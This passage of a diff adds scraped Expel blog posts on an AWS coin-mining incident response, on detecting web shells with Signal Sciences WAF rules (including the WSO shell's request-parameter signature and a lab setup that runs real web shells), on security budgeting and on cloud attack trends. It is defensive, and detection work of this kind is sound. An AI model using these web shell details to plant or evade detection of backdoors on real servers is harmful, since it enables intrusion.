detection strategy around ASC that improves visibility and coverage for our existing customers, and improves our analysts\u2019 experience \u2013 creating greater efficiency across the board. Remember the feedback loop I mentioned? Like all integrations we build, we don\u2019t consider the integrations to ever truly be complete. There\u2019s always another company behind integrations that is making changes (hopefully improvements) that affect Expel. That\u2019s another reason communicating in real-time is key. Each of Expel\u2019s internal teams have the ability to drive changes to the integration or detection strategy. If you\u2019re considering building your own detections on top of Azure signal, I hope this post gave you a few ideas (and maybe even saved you some time AND money). Want to find out more about Azure signal and log sourcing? Check out our guidebook here ." +} \ No newline at end of file diff --git a/behind-the-scenes-in-the-expel-soc-alert-to-fix-in-aws.json b/behind-the-scenes-in-the-expel-soc-alert-to-fix-in-aws.json new file mode 100644 index 0000000000000000000000000000000000000000..a33b4acf9433743422d9d39c5b118c7c721c90fd --- /dev/null +++ b/behind-the-scenes-in-the-expel-soc-alert-to-fix-in-aws.json @@ -0,0 +1,6 @@ +{ + "title": "Behind the scenes in the Expel SOC: Alert-to-fix in AWS", + "url": "https://expel.com/blog/behind-the-scenes-expel-soc-alert-aws/", + "date": "Jul 28, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Behind the scenes in the Expel SOC: Alert-to-fix in AWS Security operations \u00b7 8 MIN READ \u00b7 JON HENCINSKI, ANTHONY RANDAZZO, SAM LIPTON AND LORI EASTERLY \u00b7 JUL 28, 2020 \u00b7 TAGS: Cloud security / How to / Managed detection and response / Managed security / SOC Over the July 4th holiday weekend our SOC spotted a coin-mining attack in a customer\u2019s Amazon Web Services (AWS) environment. The attacker compromised the root IAM user access key and used it to enumerate the environment and spin up ten (10) c5.4xlarge EC2s to mine Monero . While this was just a coin miner, it was root key exposure. The situation could have easily gotten out of control pretty quickly. It took our SOC 37 minutes to go from alert-to-fix. That\u2019s 37 minutes to triage the initial lead (a custom AWS rule using CloudTrail logs ), declare an incident and tell our customer how to stop the attack. Jon\u2019s take: Alert-to-fix in 37 minutes is quite good. Recent industry reporting indicates that most incidents are contained on a time basis measured in days not minutes. Our target is that 75 percent of the time we go from alert-to-fix in less than 30 minutes. Anything above that automatically goes through a review process that we\u2019ll talk about more in a bit. How\u2019d we pull it off so quickly? Teamwork. We get a lot of questions about what detection and response looks like in AWS, so we thought this would be a great opportunity to take you behind the scenes. In this post we\u2019ll walk you through the process from alert-to-fix in AWS over a holiday weekend. You\u2019ll hear from the SOC analysts and Global Response Team who worked on the incident. Before we tell you how it went down, here\u2019s the high level play-by-play: Triage, investigation and remediation timeline Now we\u2019ll let the team tell the story. Saturday, July 4, 2020 Initial Lead: 12:19:37 AM ET By Sam Lipton and Lori Easterly \u2013 SOC analysts Our shift started at 08:45 pm ET on Friday, July 3. Like many organizations, we\u2019ve been working fully remotely since the middle of March . We jumped on the Zoom call for shift handoff, reviewed open investigations, weekly alert trending and general info for situational awareness. Things were (seemingly) calm. We anticipated a quieter shift. On a typical Friday night into Saturday morning, we\u2019ll handle about 100 alerts. It\u2019s not uncommon for us to spot an incident on Friday evening/Saturday morning, but it\u2019s not the norm. It\u2019s usually slower on the weekend; there are fewer active users and devices. Our shift started as we expected, slow and steady. Then suddenly, as is the case in security operations, that all changed. We spotted an AWS alert based on CloudTrail logs that told us that EC2 SSH access keys were generated for the root access key from a suspicious source IP address using the AWS Golang SDK: Initial lead into the AWS coin-mining incident The source IP address in question was allocated to a cloud hosting provider that we hadn\u2019t previously seen create SSH key pairs via the ImportKeyPair API in this customer\u2019s AWS environment (especially from the root account!). The SSH key pair alert was followed shortly thereafter by AWS GuardDuty alerts for an EC2 instance communicating with a cryptocurrency server (monerohash[.]com on TCP port 7777). We jumped into the SIEM, queried CloudTrail logs and quickly found that the EC2 instances communicating with monerohash[.]com were the same EC2 instances associated with the SSH key pairs that were just detected. Corroborating AWS GuardDuty alert As our CTO Peter Silberman says, it was time to buckle up and \u201cpour some Go Fast\u201d on this. We\u2019ve talked about our Expel robots in a previous post . As a quick refresher, our robot Ruxie (yes\u2013 we give our robots names) automates investigative workflows to surface up more details to our analysts. In this event, Ruxie pulled up API calls made by the principal (interesting in this context is mostly anything that isn\u2019t Get*, List*, Describe* and Head*). AWS alert decision support \u2013 Tell me what other interesting API calls this AWS principal made This made it easy for us to understand what happened: The root AWS access key was potentially compromised. The root access key was used to access the AWS environment from a cloud hosting environment using the AWS Golang SDK. It was then used to create SSH keys, spin up EC2 instances via the RunInstances API call and created new security groups likely to allow inbound access from the Internet. We inferred that the root access key was likely compromised and used to deploy coin miners. Yep, time to escalate this to an incident, take a deeper look, engage the customer and notify the on-call Global Response Team Incident Handler. PagerDuty escalation to Global Response Team: 12:37:00 AM ET Our Global Response Team (GRT) consists of senior and principal-level analysts who serve as incident responders for critical incidents. AWS root key exposure introduces a high level of risk for any customer, so we made the call to engage the GRT on call using PagerDuty . The escalation goes out to a Slack channel that\u2019s monitored by the management team to track utilization. PagerDuty escalation out to the GRT on-call Incident declaration: 12:39:21 AM ET A few minutes after the initial lead landed in Expel Workbench \u2013 19 minutes to be exact \u2013 we notified the customer that there was a critical security incident in their AWS environment involving the root access key. And that access key was used to spin up new EC2 instances to perform coin mining. Simultaneously, we jumped into our SIEM and queried CloudTrail logs to help answer: Did the attacker compromise any other AWS accounts? How long has the attacker had access? What did the attacker do with the access? How did the attacker compromise the root AWS access key? At 12:56:43 ET we provided the first remediation actions to our customer to help contain the incident in AWS based on what we knew. This included: Steps on how to delete and remove the stolen root access key; and Instructions on how to terminate EC2 instances spun up by the attacker. We felt pretty good at this point \u2013 we had a good understanding of what happened. The customer acknowledged the critical incident and started working on remediation, while the GRT Incident Handler was inbound to perform a risk assessment. Alert-to-fix in 37 minutes. Not a bad start to our shift. Global Response Team enters the chat: 12:42:00 AM ET Follow @amrandazz By Anthony Randazzo \u2013 Global Response Team Lead I usually keep my phone on silent, but PagerDuty has a vCard that allows you to set an emergency contact. This bypasses your phone\u2019s notifications setting so that if you receive a call from this contact, your phone rings (whether it\u2019s in silent mode or not). We call it the SOC \u201c bat phone .\u201d This wasn\u2019t the first time I was paged in the middle of the night. I grabbed my phone, saw the PagerDuty icon and answered. There\u2019s a lot of trust in our SOC. I knew immediately that if I was being paged, then the shift analysts were confident that there was something brewing that needed my attention. I made my way downstairs to my office and hopped on Zoom to get a quick debrief from the analysts about what alerts came in and what they were able to discover through their initial response. Now that I\u2019m finally awake, it\u2019s time to surgically determine the full extent of what happened. As the GRT incident handler, it\u2019s important to not only perform a proper technical response to the incident, but also understand the risk. That way, we can thoroughly communicate with our customer at any given time throughout the incident, and continue to do so until we\u2019re able to declare that the incident is fully contained. At this point, we have the answers to most of our investigative questions , courtesy of the SOC shift analysts: Did the attacker compromise any other AWS accounts? There is no evidence of this. How long has the attacker had access? This access key was not observed in use for the previous 30 days. What did the attacker do with the access? The attacker generated a bunch of EC2 instances and enabled an ingress rule to SSH in and install CoinMiner malware. How did the attacker compromise the root AWS access key? We don\u2019t know and may never know . My biggest concern at this point was communicating to the customer that the access key remediation needs to occur as soon as possible. While this attack was an automated coin miner bot, there was still an unauthorized attacker with an intent of financial gain that had root access to an AWS account containing proprietary and potentially sensitive information lurking somewhere. There are a lot of \u201cwhat ifs\u201d floating around in my head. What if the attacker realizes they have a root access key? What if the attacker decides to start copying our customer\u2019s EBS volumes or RDS snapshots? Incident contained: 02:00:00 AM ET By 2:00 am ET we had the incident fully scoped which meant we understood: When the attack started How many IAM principals the attacker compromised AWS EC2 instances compromised by the attacker IP addresses used by the attacker to access AWS (ASN: AS135629) Domain and IP address resolutions to coin mining pool (monerohash[.]com:7777) And API calls made by the attacker using the root access key At this point I focused on using what we understood about the attack to deliver complete remediation steps to our customer. This included: A full list of all EC2 instances spun up by the attacker with details on how to terminate them AWS security groups created by the attacker and how to remove them Checking in on the status of the compromised root access key I provided a summary of everything we knew about the attack to our customer, did one last review of the remediation steps for accuracy and chatted with the SOC over Zoom to make sure we set the team up for success if the attacker came back. For reference, below are the MITRE ATT&CK Enterprise and Cloud Tactics observed during Expel\u2019s response: MITRE ATT&CK Enterprise and Cloud Tactics observed during Expel\u2019s response Initial Access Valid Accounts Execution Scripting Persistence Valid Accounts, Redundant Access Command and Control Uncommonly Used Port With the incident now under control, I resolved the PagerDuty escalation and called it a morning. PagerDuty escalation resolution at 2:07am ET Tuesday, July 7th Follow @jhencinski By Jon Hencinski \u2013 Director of Global Security Operations Critical incident hot wash: 10:00:00 AM ET For every critical incident we\u2019ll perform a lightweight 15-minute \u201chot wash.\u201d We use this time to come together as a team to reflect and learn. NIST has some opinions on what you should ask , at Expel we mainly focus on asking ourselves: How quickly did we detect and respond? Was this within our internal target? Did we provide the right remediation actions to our customer? Did we follow the process and was it effective? Did we fully scope the incident? Is any training required? Were we effective? If not, what steps do we need to take to improve? If you\u2019re looking for an easy way to get started with a repeatable incident hot wash, steal this: Incident hot wash document template. Steal me! The bottom line: celebrate what went well and don\u2019t be afraid to talk about where you need to improve. Each incident is an opportunity to advance your skills and train your investigative muscle. Lessons Learned We were able to help our customer get the situation under control pretty quickly but there were still some really interesting observations: It\u2019s entirely possible that the root access key was scraped and passed off to the bot to spin up miners right before this was detected. We didn\u2019t see any CLI, console or other interactive activity, fortunately. The attacker definitely wasn\u2019t worried about setting off any sort of billing or performance alarms given the size of these EC2s. This was the first time we saw an attacker bring their own SSH key pairs that were uniquely named. Usually we see these generated in the bot automation run via the CreateKeyPair API. The CoinMiner was likely installed via SSH remote access (as a part of the bot). We didn\u2019t have local EC2 visibility to confirm, but an ingress rule was created in the bot automation to allow SSH from the Internet. This was also the first time we\u2019d observed a bot written in the AWS Golang software development kit (SDK). This is interesting because as defenders, it\u2019s easy to suppress alert-based on user-agents, particularly SDKs we don\u2019t expect to be used in attacks. We\u2019ll apply these lessons learned, continue to improve our ability to spot evil quickly in AWS and mature are response procedures. While we felt good about taking 37 minutes to go from alert-to-fix in AWS in the early morning hours, especially during a holiday, we don\u2019t plan on letting it get to our heads. We hold that highly effective SOCs are the right combination of people, tech and process. Really great security is a process, there is no end state \u2013 the work to improve is never done! Did you find this behind-the-scenes look into our detection and response process helpful? If so, let us know and we\u2019ll plan to continue pulling the curtain back in the future!" +} \ No newline at end of file diff --git a/better-web-shell-detections-with-signal-sciences-waf.json b/better-web-shell-detections-with-signal-sciences-waf.json new file mode 100644 index 0000000000000000000000000000000000000000..b8bc580abda5b5b24654ec9e9d026ffbbe907ce7 --- /dev/null +++ b/better-web-shell-detections-with-signal-sciences-waf.json @@ -0,0 +1,6 @@ +{ + "title": "Better web shell detections with Signal Sciences WAF", + "url": "https://expel.com/blog/better-web-shell-detections-with-signal-sciences-waf/", + "date": "Oct 9, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Better web shell detections with Signal Sciences WAF Security operations \u00b7 5 MIN READ \u00b7 ALEC RANDAZZO \u00b7 OCT 9, 2019 \u00b7 TAGS: Get technical / How to / Managed security / SOC If you work for an organization that has a web presence (and let\u2019s be real, they almost all do) and that presence is perfectly coded, has zero vulnerabilities nor any functions that could be misused \u2026 then you can stop reading. For everyone else, know that there\u2019s a real chance of your website being compromised at some point \u2014 leading to things like website defacement , website functionality modification or a broader compromise of the network . The common theme for these sorts of attacks are web vulnerabilities that lead to the upload of web shells, giving an attacker a foothold on the underlying server. In this blog post, I\u2019ll talk about what a web shell is, some of the typical ways of detecting them and the (vastly improved) detection method I discovered. What\u2019s a web shell? A web shell is a web page or web resource that abuses certain functions in web languages (like PHP, JavaScript, etc.) that give it backdoor-like capabilities to the underlying web server. Capabilities typically include things like file upload, file download, and arbitrary command execution. Web shells usually crop up after a threat actor exploited a website vulnerability and gives the attacker an initial foothold onto a network through the web server. Typical methods of detecting web shells Detection of web shells traditionally comes in two forms, both with downsides. The first detection method involves detection on the endpoint by file name, file hash, or file content. Unfortunately this is often CPU intensive which means business operations teams may not allow you to do it on production systems. The second method is passive and effective but it\u2019s a pain to set up and manage. It involves mirroring web traffic to a network traffic monitoring device that has built-in detections or supports custom Snort or Suricata rules. You\u2019ll also need to upload your web server SSL private keys to the network appliance(s) for SSL decryption or you won\u2019t be able to inspect encrypted web traffic. I don\u2019t know about you, but that\u2019s not a mess that I\u2019d want to manage or deal with. How Expel uses Signal Sciences WAF to detect web shells One of the commitments we\u2019ve made to our customers since Expel was founded is to support and integrate with the security technologies that our customers already use or plan to buy. Several of our customers use the Signal Sciences Web Application Firewall (WAF) , so we created an easy way to integrate those security signals into Expel Workbench. As we were developing our integration, I discovered that the Signal Science WAF has a great capability to detect web shells thanks to a complete application layer visibility into web traffic with a user-friendly rules engine bolted on top. That\u2019s right \u2014 a rules engine that allows you to key off of web content such as HTTP methods, any header keys and values (even custom headers), query parameter keys and values, post body keys and values, domain, URI, or any combination of the preceding items. This visibility and rules engine allows us to augment customers\u2019 Signal Sciences WAF deployments with granular rules that detect network traffic to popular web shell variants with a high fidelity (meaning it\u2019ll only trigger on the traffic we\u2019re looking for). I\u2019ll pull back the curtain and show you how Expel develops web shell detection rules for its customers so you can try the process yourself with your own Signal Science WAF deployment. How Expel develops web shell detection rules using the Signal Sciences rules engine Here\u2019s a high-level overview of the web shell detection rule development process: Stand up a web server running whatever web language you want to develop rules for and install the Signal Science WAF agent. I started with an Ubuntu server running Apache and PHP. Find some web shells. Thankfully that\u2019s not very hard. Copy web shells you want to write rules for to a directory the web service is serving resources from. Load up a packet capturing tool or my preferred tool, Chrome browser\u2019s built-in developer\u2019s console. Access the web shell and use its various functions, looking for unique indicators in the HTTP requests. Create the rule to detect the web shell in the Signal Science WAF rule editor and hook it up to a signal that would generate an alert. Test out your new rule by interacting with the web shell again, verifying that all the actions you intended to detect are being detected. Now I\u2019ll walk through the specifics of creating a rule for the WSO web shell version 4.0.5 (MD5: b4d3b9dbdd36cac0eba7a598877b6da1 ) starting at step 5 of the process I described above. The following screenshot series will show you how to take different actions through the WSO web shell while having Chrome\u2019s developer console open. You\u2019ll see me: Executing \u201cpwd\u201d to return my present working directory. Executing \u201cls\u201d to return a directory listing of my current working directory. Using the built in function \u201cProcess status\u201d which is a WSO execution wrapper around the shell command \u201cps aux\u201d and Navigating to the root of the server\u2019s file system. In each screenshot below, I added red boxes around the post-body parameters my browser sent to the web shell. Take a peek: Execution of \u201cpwd\u201d to return the present working directory. Execution of \u201cls\u201d to return a list of content in the current working directory. Use of \u201cProcess status\u201d which is a WSO execution wrapper around the shell command \u201cps aux\u201d Navigation to the root of the server\u2019s file system. Each request always had the parameters \u201ca\u201d, \u201cc\u201d, \u201cp1\u201d, \u201cp2\u201d, \u201cp3\u201d and \u201ccharset.\u201d It turns out that all actions taken while using this web shell will have those parameters. If you review other versions of the WSO web shell this\u2019ll also be true. So if you want to generically detect WSO web shell use regardless of version, all you need to do is look for all those parameters being present in a request. Before you write a rule, you need to prepare a few things in the Signal Sciences WAF: Create a \u201csite signal\u201d on each site where you want your rules monitoring that your rules will point to. In my example, I called the signal \u201cexpel-alert\u201d. Create a \u201csite alert\u201d that takes in the new signal and set the threshold to one request in one minute. This is the lowest threshold that you can set. Since your WSO web shell will be high fidelity, you want an alert generated if that threshold is ever met. Signal Sciences WAF has a powerful feature called \u201cadvanced rules\u201d which Signal Sciences reps can turn on for you. There\u2019s an additional cost, but the feature greatly expands the WAF\u2019s capability. For each Expel customer that has a Signal Science WAF, we deploy an advanced rule. This rule turns on verbose logging that records post-body contents and query parameters. We only enable verbose logging on expel-alert signals. This gives us complete visibility into commands sent to a web shell so we can investigate alerts. Now onto the meat of the rule. In the \u201csite rule\u201d editor, you\u2019ll want to chain five \u201cPost Parameter exists where name equals \u201d where \u201c\u201d are the values \u201ca\u201d, \u201cc\u201d, \u201cp1\u201d, \u201cp2\u201d, \u201cp3\u201d, and \u201ccharset\u201d. Set the rule action to add the signal \u201cexpel-alert\u201d. Take a look at the final rule configuration: The final step is to test the efficacy of your rule by using the web shell some more to see what gets tagged. Take a look at the screen shot below \u2014 every request we made to the web shell was tagged with \u201cexpel-alert\u201d and has its post-body contents logged. Success! Bonus: Free web shell detection rules As a reward for making it through this blog post, I\u2019ve got a prize for you: ten web shell detection rules that you can upload right into your Signal Science WAF. They\u2019ll detect WSO, r57, c99, c99 madnet, PAS, China Chopper, B374k, reGeorg and reDuh web shells. There\u2019s also a generic rule to detect some common commands that could be pushed to web shells we don\u2019t have explicit rules for. To download these web shell detection rules, submit your info below and we\u2019ll send it over in an email." +} \ No newline at end of file diff --git a/blog.json b/blog.json new file mode 100644 index 0000000000000000000000000000000000000000..1bfe4ed03420591e6ecad034abd07164c77562c0 --- /dev/null +++ b/blog.json @@ -0,0 +1,6 @@ +{ + "title": "Blog", + "url": "https://expel.com/blog/page/5/", + "date": null, + "contents": null +} \ No newline at end of file diff --git a/budget-planning-determining-your-security-spend.json b/budget-planning-determining-your-security-spend.json new file mode 100644 index 0000000000000000000000000000000000000000..4b2acd9d71466cd0492115c98f3ba32cfb68b3b1 --- /dev/null +++ b/budget-planning-determining-your-security-spend.json @@ -0,0 +1,6 @@ +{ + "title": "Budget planning: determining your security spend", + "url": "https://expel.com/blog/budget-planning-determining-security-spend/", + "date": "Oct 16, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Budget planning: determining your security spend Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 OCT 16, 2017 \u00b7 TAGS: Budget / Management / Planning It\u2019s a common question: \u201cHow much should I spend on cybersecurity?\u201d Looking at your peers, analyst guidance, and postings on random security companies\u2019 websites, it\u2019s a difficult question. And there\u2019s not a one-size-fits-all answer. It may seem counterintuitive, but how much you spend on security is really a trailing indicator of how your company views security. In corporate life, we\u2019re asked to set a budget long before we\u2019ll actually spend the money. So, we talk to our staff, we talk to company leadership and we attend conferences to figure out what we should be doing about cybersecurity and cyber risk management in our organization. Then we put together a budget, which gets kicked around for a while before it\u2019s eventually approved. A few months later we, start finally spending those budget dollars. But by that time we\u2019re really implementing our vision of security as it was 6 or even 12 months ago. What bucket are you in? What your vision is depends a lot on how your company views cybersecurity. I\u2019ve found most organizations fall into one of five buckets. Do any of these sound familiar? Security as an enabler ($$$$) \u2013 These are businesses that view cybersecurity as a differentiator to their service or product. They\u2019re implementing \u201cleading edge\u201d security solutions in an effort to set them apart from the pack. Risk based ($$$) \u2013 Organizations that have risk-based cybersecurity are constantly making tradeoffs between required security controls and their risk appetite. While spending in these organizations can be high, it\u2019s also organized and controlled. Security as a requirement ($$) \u2013 Some businesses use regulatory and industry requirements to guide their spend. This is often less expensive than a risk-based approach but it won\u2019t have the same coverage of controls. Yet another piece of IT ($) \u2013 In these organizations, security is managed like IT spend, which for the most part means minimizing cost and not pulling from the bottom line. Reactionary ($?*!$) \u2013 This is the \u201clet the winds blow us where they may\u201d strategy of cybersecurity. When things go badly, there\u2019s a large spend. When they go well, the spend is minimal. Real Dollars By now I\u2019m guessing you\u2019ve plotted what bucket your organization is in. But practically, how big are those dollar signs? According to Gartner , cybersecurity spend can vary from 1% to 13% of the overall IT budget. That\u2019s a pretty big range that doesn\u2019t speak well to the maturity of the state of the security profession. At the low end of that spend, you\u2019ll have organizations with minimal security controls and security incidents that go undetected and unaddressed for long periods of time. At the high end, you\u2019ve got armies of dedicated staff, heavy tolling and engaged executives sponsoring cybersecurity initiatives. Be aware, though, that absolute dollars are only one measurement. It\u2019s important to understand where this money is being spent\u2026 or more appropriately where it could be spent. Cybersecurity spend comes in many forms including staff, security software, hardware, contractor support, and outside services. Depending on your needs, you\u2019ll find you get different levels of value depending on which buckets you spend your dollars in. For instance, in a small organization that is sensitive to hiring more staff, contract support or outside services may be a better bet than ramping up staffing. In larger, more sophisticated organizations, spending on software and hardware that automates existing security controls and processes may be the best thing you can do. Each approach has a different price tag and will affect where you land on the one to 13 percent spectrum. Find your focus (aka it\u2019s all about outcomes) If you\u2019re struggling to figure out what type of security organization you\u2019re trying to be and what your long-term strategy is, my advice is to focus on your desired outcomes \u2013 both in proactive and reactive situations. Ask yourself: \u201cWhat outcomes do I want, and when do they need to be possible?\u201d Combine the answers to help focus your initial budget thinking\u2026 or at least rationalize your planned spend and set company expectations on realistic outcomes. If your budget and expectations don\u2019t match (typically the budget is too small to meet the desired expectations) you need to do one of three things: 1) get more budget, 2) right-size expectations, 3) find a new job proactively because this story won\u2019t end well and you will likely be the scapegoat. Avoiding the trap door when you\u2019re in the breach zone There will always be ebbs and flows when it comes to how much money there is to go around. Everyone has lived through a budget crunch at some point and had to tighten belts and live off less. On the flip side, if you\u2019ve suffered a major security event recently, your budget likely got a bump to help you deal with the breach, response activities, and remediation. I call this the \u201cbreach zone\u201d. If you\u2019ve been there you\u2019ve probably also witnessed the \u201cpanic spending\u201d that typically follows. Spending that windfall quickly is often seen as a proxy for progress. But it can also be a trap that sets you up for failure down the line. Why? Panic spending often results in buying products and services you don\u2019t ultimately get value from. What\u2019s worse is that you\u2019re then stuck paying for those products out into the future \u2013 increasing your long-term budget needs even more with things you don\u2019t need. Not to mention the time it takes to maintain them. It\u2019s a bit like stretching to afford a sports car but then you realize you can\u2019t afford the expensive gas and insurance. A healthier approach is to use the specter of a breach to drive your budgeting process. If you\u2019re lucky enough to have escaped a breach, congrats. Pretend you have and go back to that outcome-based approach I talked about earlier. What do you need? What would you want to change in your org to achieve them? What investments would you make and what would you do differently? Use those answers to guide your budget process. Scenario based budget planning can help you build a budget for the security you\u2019re likely to need and ensure your spend is on target with what your organization requires in the future. Finding your spend Based on all this, the question still stands: \u201cHow much should I spend on cybersecurity?\u201d The answer to that question is unique to each organization. As I said at the start, there\u2019s no one-size-fits-all answer. It depends on your maturity, current capabilities, executive support, and threat model; you may have wildly different spending needs than your peers. But there are some things you can do to find the budget that\u2019s right for you. Review your past spend and do an assessment. Did you get the results you want? What would you have done differently? Tabletop some terrible events like breaches and insider attacks. What would you need to respond? What would you need to stop it from happening? Use these answers to drive your budget and spending decisions. And remember that your budget is your own. Just because another organization is spending more or less doesn\u2019t matter if you\u2019re getting the results you want." +} \ No newline at end of file diff --git a/cloud-attack-trends-what-you-need-to-know-and-how.json b/cloud-attack-trends-what-you-need-to-know-and-how.json new file mode 100644 index 0000000000000000000000000000000000000000..aab8e5833730567acebb5aacfda636b36ff39df6 --- /dev/null +++ b/cloud-attack-trends-what-you-need-to-know-and-how.json @@ -0,0 +1,6 @@ +{ + "title": "Cloud attack trends: What you need to know and how ...", + "url": "https://expel.com/blog/cloud-attack-trends-need-to-know/", + "date": "May 25, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Cloud attack trends: What you need to know and how to stay resilient Security operations \u00b7 7 MIN READ \u00b7 ANTHONY RANDAZZO \u00b7 MAY 25, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools Well, 2020 is getting smaller in our rearview mirror as our journey into 2021 takes us closer to summer. Good riddance. We\u2019d be remiss, though, if we didn\u2019t take some time to reflect on the things we observed and learned over the last year at Expel. So, we decided to take a close look at the cloud threat landscape. While we can easily get hung up on the black swan events of the year, we took a more data-driven approach to find the greatest threats to the majority of orgs today. At Expel, we view the cloud as any infrastructure, platforms or applications living in some data center that your org doesn\u2019t wholly manage. This might be your Amazon Web Services (AWS) or Microsoft Azure cloud infrastructure; an O365 or G Suite tenant; your GitHub repositories or perhaps the Okta instance that manages identity to all of your end users. During the COVID-19 pandemic, our SOC saw that bad actors wasted no time thinking of more evil ways to attack in the cloud and take advantage of people using phishing tactics. See full \u201cTop cybersecurity attack trend during COVID: Phishing\u201d infographic And the IC3\u2019s 2020 Internet Crime Report echoes our findings. It\u2019s disheartening to see that attackers used a crisis to their advantage to infiltrate cloud apps and increase their phishing efforts. But it\u2019s also not surprising. Bad actors will continue to evolve their tactics, using health and economic crises to manipulate unsuspecting people into surrendering their credentials and other information. That doesn\u2019t mean hope is lost. There are ways to remediate and stay resilient against the inevitable attacks in your cloud and phishing ploys. Follow @amrandazz In this blog post, I\u2019ll cover the top three types of attacks we saw between March 2020 and March 2021, how to respond to an attack if it happens to you and share some steps you can take today to drastically reduce the chance of it happening to your business. Attack trend: Business email compromise If you\u2019ve taken a look at our \u201cTop cybersecurity attack trend during COVID: Phishing\u201d infographic, you\u2019ll know that business email compromise (BEC) is still public enemy number one. Here at Expel, the scale tips favorably toward BEC incidents in O365 versus G Suite. And there\u2019s one primary reason for that: O365 has some initial configurations that need to be changed by default, whereas G Suite\u2019s settings out-of-the-box are pretty straightforward. We previously covered these configurations but here\u2019s the TL;DR: With original deployments of O365 tenants, IMAP and POP3 were enabled by default in O365 Exchange as well as BasicAuthentication . IMAP and POP3 don\u2019t support multi-factor authentication (MFA), so even if you have MFA enabled, attackers can still access these mailboxes. BasicAuthentication allows attackers to authenticate with clients past any pre-authentication checks to the Identity Provider which could lead to unwanted account compromises or account lockouts from password spray or brute force attacks. Microsoft intended on doing away with BasicAuthentication by default but has postponed this rollout due to the COVID-19 pandemic. This is now expected to rollout before the end of 2021. Google, on the other hand, disables these configurations in G Suite by default but allows them to be enabled ex post facto. Remediation What should you do if you identify someone that shouldn\u2019t be in your O365 Exchange? Fortunately, it\u2019s pretty straightforward. Reset the user\u2019s credentials; Review the mailbox audit logs to determine if any unsavory activity occurred; and Remove any mail forwarding rules (if applicable). Resilience There are quite a few things you can do to prevent these BECs from being commonplace in your cloud email. First and foremost, ensure that you\u2019re using MFA wherever possible. While it\u2019s not a silver bullet, it\u2019s absolutely critical in today\u2019s cloud-first environments. Our data infers that 35 percent of the BEC attempts we\u2019ve spotted could have been prevented by enabling MFA. Next, disable legacy protocols such as IMAP and POP3. Again, these don\u2019t support any sort of Modern Authentication (Modern Auth) which means an attacker can bypass MFA completely by using an IMAP/POP3 client. Once those are turned off, strongly consider disabling BasicAuthentication to prevent any pre-auth headaches on your O365 tenants. Seven percent of BEC attempts could have been stopped by enforcing modern authentication. If you\u2019re still not sleeping well at night, then consider implementing some extra layers of conditional access for your riskier user base. You can even create a conditional access policy to require MFA registration from a location marked as a trusted network. This prevents an attacker from registering MFA from an untrusted network. Lastly, don\u2019t neglect your secure mail gateway. We recently helped a customer make some configuration changes that ultimately lead to a major drop in volume of phishing emails they received on a daily basis \u2013 reducing their BEC incident count. Attack trend: Cloud access providers If we remove the explicit BEC incidents, the next biggest target we see are cloud access identity providers like Okta or OneLogin. While some attackers might just want access to your email for fraud purposes, others have their eyes on a bigger prize: the data behind your applications. Many orgs already migrated to SSO (SAML) authentication, and this is especially the case in a post-2020 working environment where many employees work remotely. Which means that attackers can hit more than just mail providers as an easy target to harvest credentials. During 2020, we saw attacks on Okta quite a bit. So we\u2019ll focus our remediation recommendations there. So, how are all of these Okta accounts getting compromised? A couple ways. First, it\u2019s entirely possible to intercept session tokens for Okta after MFA has been established. We\u2019ve talked about this tactic a bit in the past (and yes, U2F will prevent this). These session tokens can then be used to maintain access indefinitely depending on the refresh token and any limitations it might have. But there\u2019s an even simpler approach: hoping unsuspecting end users will click that push notification. You might be amazed at how frequently this occurs. And the results can be disastrous (we personally have over 50 published applications for certain users in Okta). Remediation Remediation after a confirmed Okta access compromise may be a bit more involved than a BEC limited to a single Exchange Online mailbox. Here are the high level tasks: Terminate the user\u2019s active sessions to disrupt existing authenticated entities; Reset the compromised credentials; and Determine if an attacker accessed any published applications (hopefully not as this will require subsequent remediation and responses against those apps). We have a quick workflow here at Expel that will grab all of the associated SSO activity. Resilience Okta, in particular, has a feature called Adaptive MFA which creates behavioral profiles of each of your users and introduces a little bit of friction when an anomalous login occurs. This friction might be the difference between a compromise or not. If you\u2019re running sensitive applications in Okta, then you might consider applying application-level MFA . Lastly, while we have become more distributed in a post-pandemic world, you might also consider implementing Network Zones to effectively develop an allow list for access in your sign-on policies. Cloud attack trend: Cloud infrastructure When we started theorizing where to focus detection efforts in cloud infrastructure, it was apparent that most risk lied on access within the control (management) planes. It turns out that attackers are, in fact, interested in this sort of access . Excessive access to the control plane opens organizations up to a bunch of problems and the reality is that all of the \u201cshift left\u201d security in the world doesn\u2019t prevent the use of compromised credentials. We know this access may be for financial gain or perhaps even persistent access . The good news is that there are a variety of ways to prevent this. Remediation Cloud infrastructure response can have a bit of variance given that they each have completely different Identity and Authentication Management (IAM) implementations. In AWS, it\u2019s a little more straightforward. Identify all compromised access keys. Some exposed or compromised access keys may happen en masse so it\u2019s best to make sure you\u2019ve found them all. This can be done by pivoting based on the attacker access indicators such as IP address. Snapshot and remove any new infrastructure created by the attackers. Determine if any data plane access occurred (i.e. SSH access to your EC2) and respond as necessary. Resilience Inadvertently exposed secrets can exacerbate this problem so it\u2019s important to to get a hold over your public git repositories. There are commercially available products to identify exposed secrets such as GitGuardian , or you can go at it yourself and use open source projects like truffleHog . The good news is that repositories like GitHub delay the public API by five minutes to give organizations a head start to remediate these sorts of exposures. Another thing to think about is subscribing to AWS Security Hub to develop your own use-cases for automated incident response , or again, you can run at this alone via custom Lambda, CloudWatch or even your own SOAR platform. Another great AWS Organizations\u2019 feature: develop least privilege access control with Service Control Policies to limit the blast radius of compromised credentials. New attacks. New resources. So what\u2019s in store for us for the rest of 2021? Well, we wish we had a crystal ball to say for sure but we can make some pretty educated guesses based on what we saw over the last 12 to 18 months. Events like the SolarWinds breach reminded us that the cloud is absolutely a target (golden SAML in Azure) and that we need to stay diligent \u2013 and prepare for what might be around the corner. While attacks in the cloud and phishing aren\u2019t new, we know that bad actors will continue to get creative. And one thing is for sure: we\u2019ll continue to see BEC attacks at the same volume or even increase this year. Microsoft will hopefully roll out their more proactive controls such as deprecated support for BasicAuthentication for Azure Active Directory (AzureAD) in 2021. Although, it seems like it\u2019s going to be at least a year before that comes to fruition for orgs that have mail clients actually using those authentication protocols with Exchange Online. Fortunately, we\u2019ll continue to see the development of resources and services that address new and changing security needs. At Expel, we\u2019ve been working on providing new products and services to help our existing and new customers endure the onslaught of 2020, and the new 